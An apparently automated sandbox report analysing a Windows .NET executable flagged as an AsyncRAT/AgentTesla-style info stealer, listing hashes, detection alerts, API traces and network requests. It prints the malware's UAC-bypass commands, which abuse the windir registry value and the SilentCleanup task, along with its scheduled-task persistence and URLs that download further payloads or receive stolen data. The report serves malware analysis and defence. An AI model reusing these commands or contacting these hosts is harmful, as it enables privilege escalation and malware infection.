Summary | ZeroBOX

zxcvb.exe

Tags: Gen1, AsyncRAT, AgentTesla, info stealer, browser, Chrome, Malicious Packer, Antivirus, Google User Data, HTTP, ScreenShot, Create Service, KeyLogger, Internet API, DGA, Http API, FTP, Socket, Escalate privileges, DNS, PWS, Sniff Audio
Category: FILE
Machine: s1_win7_x6401
Started: June 4, 2021, 6:09 p.m.
Completed: June 4, 2021, 6:23 p.m.
Size 943.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 e02ae8a88df1daa8a2cf8af319a386e3
SHA256 eb352ae2d557edc7edd516a4dd9122a4d7c2ea0646f9844135b7360fec1805f4
CRC32 3C6C14C7
ssdeep 24576:wGsGo+3OXAVS6W8ch8+5zIbT77KZ2JRT0BpFg:qp8V/65zOm0Kp
Yara
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • PE_Header_Zero - PE File Signature
  • Is_DotNET_EXE - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • IsPE32 - (no description)

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49205 -> 95.216.186.40:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2400023 ET DROP Spamhaus DROP Listed Traffic Inbound group 24 Misc Attack
TCP 192.168.56.101:49201 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49201 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49280 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49280 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 34.88.140.135:80 -> 192.168.56.101:49206 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49293 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49320 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 185.215.113.77:80 -> 192.168.56.101:49333 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49312 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 185.215.113.77:80 -> 192.168.56.101:49279 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.101:49279 -> 185.215.113.77:80 2019714 ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile Potentially Bad Traffic
TCP 192.168.56.101:49294 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49318 -> 162.159.130.233:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.101:49205 -> 95.216.186.40:443 | C=US, O=Let's Encrypt, CN=R3 | CN=tttttt.me | ff:46:0a:ed:46:1a:92:da:d9:8a:95:d8:4b:c2:3d:51:b8:73:06:13
TLSv1 192.168.56.101:49293 -> 162.159.130.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.101:49320 -> 162.159.130.233:443 | None | None | None
TLSv1 192.168.56.101:49294 -> 162.159.130.233:443 | None | None | None
TLSv1 192.168.56.101:49318 -> 162.159.130.233:443 | C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da

Time & API | Arguments | Status Return Repeated

GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
GetComputerNameA | computer_name: TEST22-PC | 1 1 0
GetComputerNameW | computer_name: TEST22-PC | 1 1 0
Time & API | Arguments | Status Return Repeated

IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
IsDebuggerPresent | (no arguments) | 0 0
Time & API | Arguments | Status Return Repeated

WriteConsoleW | buffer: C:\Users\Public> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: start | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: /min C:\Users\Public\UKO.bat | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\Public> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: reg | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: delete hkcu\Environment /v windir /f | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\Public> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: reg | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM " | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: C:\Users\Public> | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: schtasks | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: exit | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: The system was unable to find the specified registry key or value. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: The operation completed successfully. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: ERROR: | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: The system cannot find the path specified. | console_handle: 0x0000000b | 1 1 0
WriteConsoleW | buffer: SUCCESS: The scheduled task "Updates\pYVWAjXtpzU" has successfully been created. | console_handle: 0x00000007 | 1 1 0
WriteConsoleW | buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. | console_handle: 0x00000007 | 1 1 0
Time & API | Arguments | Status Return Repeated

CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d2a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049de20, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d9a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d9a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d9a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d5e0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049dae0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d1a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x0049d6a0, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API | Arguments | Status Return Repeated

GlobalMemoryStatusEx | (no arguments) | 1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
CopyPDBs+0x1b552 DllCanUnloadNowInternal-0x25a85 clr+0x1b1194 @ 0x728f1194
LogHelp_TerminateOnAssert+0x14061 GetPrivateContextsPerfCounters-0x53e1 clr+0x82ba1 @ 0x727c2ba1
0x6d48a9
0x6d479d
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
CoUninitializeEE+0xa5b4 CreateAssemblyNameObject-0x36a1 clr+0x29df8 @ 0x72769df8
CoUninitializeEE+0xa5eb CreateAssemblyNameObject-0x366a clr+0x29e2f @ 0x72769e2f
CoUninitializeEE+0xa6b9 CreateAssemblyNameObject-0x359c clr+0x29efd @ 0x72769efd
CoUninitializeEE+0xa75e CreateAssemblyNameObject-0x34f7 clr+0x29fa2 @ 0x72769fa2
LogHelp_TerminateOnAssert+0x16b0b GetPrivateContextsPerfCounters-0x2937 clr+0x8564b @ 0x727c564b
CreateAssemblyNameObject+0x2e9ca GetMetaDataInternalInterface-0x9aa5 clr+0x5be63 @ 0x7279be63
CreateAssemblyNameObject+0x2e4ff GetMetaDataInternalInterface-0x9f70 clr+0x5b998 @ 0x7279b998
CreateAssemblyNameObject+0x2e28d GetMetaDataInternalInterface-0xa1e2 clr+0x5b726 @ 0x7279b726
CreateAssemblyNameObject+0x2eacf GetMetaDataInternalInterface-0x99a0 clr+0x5bf68 @ 0x7279bf68
CreateAssemblyNameObject+0x2e84b GetMetaDataInternalInterface-0x9c24 clr+0x5bce4 @ 0x7279bce4
DllRegisterServerInternal+0xa898 CoUninitializeEE-0x2ba0 clr+0x1cca4 @ 0x7275cca4
DllRegisterServerInternal+0xa92b CoUninitializeEE-0x2b0d clr+0x1cd37 @ 0x7275cd37
DllGetClassObjectInternal+0x437c8 CorDllMainForThunk-0x48d33 clr+0x108841 @ 0x72848841
LogHelp_TerminateOnAssert+0x129a9 GetPrivateContextsPerfCounters-0x6a99 clr+0x814e9 @ 0x727c14e9
mscorlib+0x2d3711 @ 0x6ff13711
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
microsoft+0x1069af @ 0x6df169af
microsoft+0x10261c @ 0x6df1261c
microsoft+0x1037a6 @ 0x6df137a6
0x6d401c
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
LogHelp_TerminateOnAssert+0x12cf8 GetPrivateContextsPerfCounters-0x674a clr+0x81838 @ 0x727c1838
LogHelp_TerminateOnAssert+0x12bf7 GetPrivateContextsPerfCounters-0x684b clr+0x81737 @ 0x727c1737
mscorlib+0x2d36ad @ 0x6ff136ad
mscorlib+0x308f2d @ 0x6ff48f2d
mscorlib+0x2cb060 @ 0x6ff0b060
microsoft+0x1069af @ 0x6df169af
microsoft+0x103438 @ 0x6df13438
microsoft+0x14b2e5 @ 0x6df5b2e5
0x6d3ccb
0x6d37ce
0x6d047c
0x6d0213
0x6d008b
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728074ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72807610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72891dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72891e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72891f7a

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xe0434f4e
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 2542040
registers.edi: 0
registers.eax: 2542040
registers.ebp: 2542120
registers.edx: 0
registers.ebx: 6424176
registers.esi: 5990648
registers.ecx: 285472593
1 0 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/axcxcvhgfc.exe
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://34.88.140.135/
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ac.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/oxcxcvhgfc.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/rc.exe
suspicious_features POST method with no referer header suspicious_request POST http://veronika.ac.ug/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds1.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/ds2.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://185.215.113.77/cc.exe
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/softokn3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/sqlite3.dll
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST http://veronikaa.ac.ug/freebl3.dll
suspicious_features GET method with no useragent header suspicious_request GET https://tttttt.me/brikitiki
request GET http://185.215.113.77/axcxcvhgfc.exe
request POST http://34.88.140.135/
request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/60386bf3c5b2b54595947b12ff770ab9abe3aa9a
request GET http://34.88.140.135//l/f/L1VU1nkBuI_ccNKoeTXp/cc8a94f61ad1ac31ed9d2c0f0fef1ca23f6e10e5
request GET http://185.215.113.77/ac.exe
request GET http://185.215.113.77/oxcxcvhgfc.exe
request GET http://185.215.113.77/rc.exe
request POST http://veronika.ac.ug/index.php
request GET http://185.215.113.77/ds1.exe
request GET http://185.215.113.77/ds2.exe
request GET http://185.215.113.77/cc.exe
request POST http://veronikaa.ac.ug/softokn3.dll
request POST http://veronikaa.ac.ug/sqlite3.dll
request POST http://veronikaa.ac.ug/freebl3.dll
request GET https://tttttt.me/brikitiki
request GET https://cdn.discordapp.com/attachments/720918485122940978/850158270907678730/Xypgtvglqrlgdvgezyimsisukuqhicz
request GET https://cdn.discordapp.com/attachments/720918485122940978/850158871501602823/Cdfyxciknlozqdclvjieazyvhyfqdvt
request POST http://34.88.140.135/
request POST http://veronika.ac.ug/index.php
request POST http://veronikaa.ac.ug/softokn3.dll
request POST http://veronikaa.ac.ug/sqlite3.dll
request POST http://veronikaa.ac.ug/freebl3.dll
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 1703936
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x007f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72741000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1684
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72742000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02200000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02340000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00382000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00445000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0044b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1684
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00447000
